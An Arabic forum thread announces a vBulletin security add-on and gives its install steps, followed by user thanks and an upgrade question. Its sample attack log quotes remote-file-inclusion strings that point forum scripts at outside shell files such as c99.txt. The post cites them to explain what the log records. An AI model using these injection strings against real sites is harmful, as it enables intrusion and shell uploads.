1 مرفق
Spacer_Close وداعا لها مع هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى تحديث جديد
السلام عليكم ورحمة الله وبركاته
لمشاهدة مثال على التحديث الجديد اضغط هنا
اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا
لمشاهدة مثال على التحديث الجديد اضغط هنا
نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني
https://mwadah.com/images/imgcache/2008/07/688.imgcache
عمل الهاك : حماية المنتدى بشكل كامل بعون الله
https://mwadah.com/images/imgcache/2008/07/689.imgcache
https://mwadah.com/images/imgcache/2008/07/690.imgcache
الخيار الاول :
لتشغيل حمايه المنتدي
منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح
منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%
حجب عدة مواقع تساعد على العبث في المنتديات
تطوير للدوال القديمة للتوافق معه السيرفر
منع اكثر اوامر اليونكس وحيل الحقن في الشيل
اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك
الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع
الان نأتي للقسم الاكثر اثارة للموضوع
عند دخولك مجلد sec
افتح الملف logfile_hacker.txt
ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل
كود PHP:
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)
الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر
طبعا الفاصلة تفصل بين كل معلومه ومعلومة
التاريخ والوقت
كود PHP:
2007-12-11, 05:50:44,
عدد المحاولات
الاستغلال
كود PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?
الان شرح التركيب
امسح جميع هاكات لها علاقه في الحمايه او منع xss
اما من ركب هاك الحمايه issw v4.0 issw v3
عليه فقط حذف ملف البرودكت
وتركيب المحدث
شرح حذف الهاك
من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت
ومن ثم حذف توابعه
---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt
وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي
واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور
مع
تحيات الفريق الامني
الان من لوحت تحكم المنتدي قم برفع البرودكت
تم تجربت المنتج على الاصدار
3.6.x
3.7.0
لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت
يطرحه هنا في الموضوع لنصل لتطوير اكثر
وجل من لا يخطأ وشكرا لكم
لتتبع جديد الهاك على الرابط التالي
http://www.is-sw.net/index.php?issw=isswvb
الحمد لله على كل شيء
لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق
اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم
التحميل لاخر اصدار هنا
تم اصلاح مشكله الفوتر
تم ترقيه عدت دوال جديده مستخدمه للهكر لعرض config
تم عمل نظام التحديث والتنزيل من لوحت تحكم المنتدي
طرق الترقيه فقط ارفع ملف البرودكت مع السماح لخيار الكتابه في الاختيار نعم
وشكرا لكم
جميع الحقوق محفوظه للفريق الامني M.M.A i.s.s.w
رد: Spacer_Close وداعا لها مع هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى تحديث جدي
سلام عليكم اخوي
انا ركبت 4.1 الاصدار هذا مثل اللي عندي
اذا بغيت اطورهـ للنسخة الجديدة بس استبدل البرودكت
[glow1=333333]نسخة منتداي 3.7.0 وهاك الحماية 4.1 الجديد[/glow1]
بارك الله فيك
رد: Spacer_Close وداعا لها مع هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى تحديث جدي
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
رد: Spacer_Close وداعا لها مع هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى تحديث جدي
اقتباس:
المشاركة الأصلية كتبت بواسطة ابوبسـمة
سلام عليكم اخوي
انا ركبت 4.1 الاصدار هذا مثل اللي عندي
اذا بغيت اطورهـ للنسخة الجديدة بس استبدل البرودكت
[glow1=333333]نسخة منتداي 3.7.0 وهاك الحماية 4.1 الجديد[/glow1]
بارك الله فيك
استبدال البرودكت لايفي بالغرض
يجب رفع الملفات كاملة مع حذف الملفات القديمة
مودتي
رد: Spacer_Close وداعا لها مع هاك الحماية الكامله i.s.s.w 4.1 وميزات لاتحصى تحديث جدي
السلام عليكم ورحمة الله وبركاته
الله يجزاكم خير رائع جدا
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
